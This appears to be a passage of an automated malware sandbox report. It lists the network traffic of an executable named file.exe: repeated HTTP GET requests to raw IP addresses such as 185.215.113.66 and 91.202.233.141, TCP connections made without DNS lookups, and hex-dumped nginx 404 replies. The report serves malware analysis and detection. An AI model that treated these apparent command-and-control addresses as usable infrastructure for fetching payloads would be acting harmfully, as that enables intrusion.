                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401C50 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv,0_2_00401C50
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /PLTRESA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 77.91.77.92
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:09:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:09:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
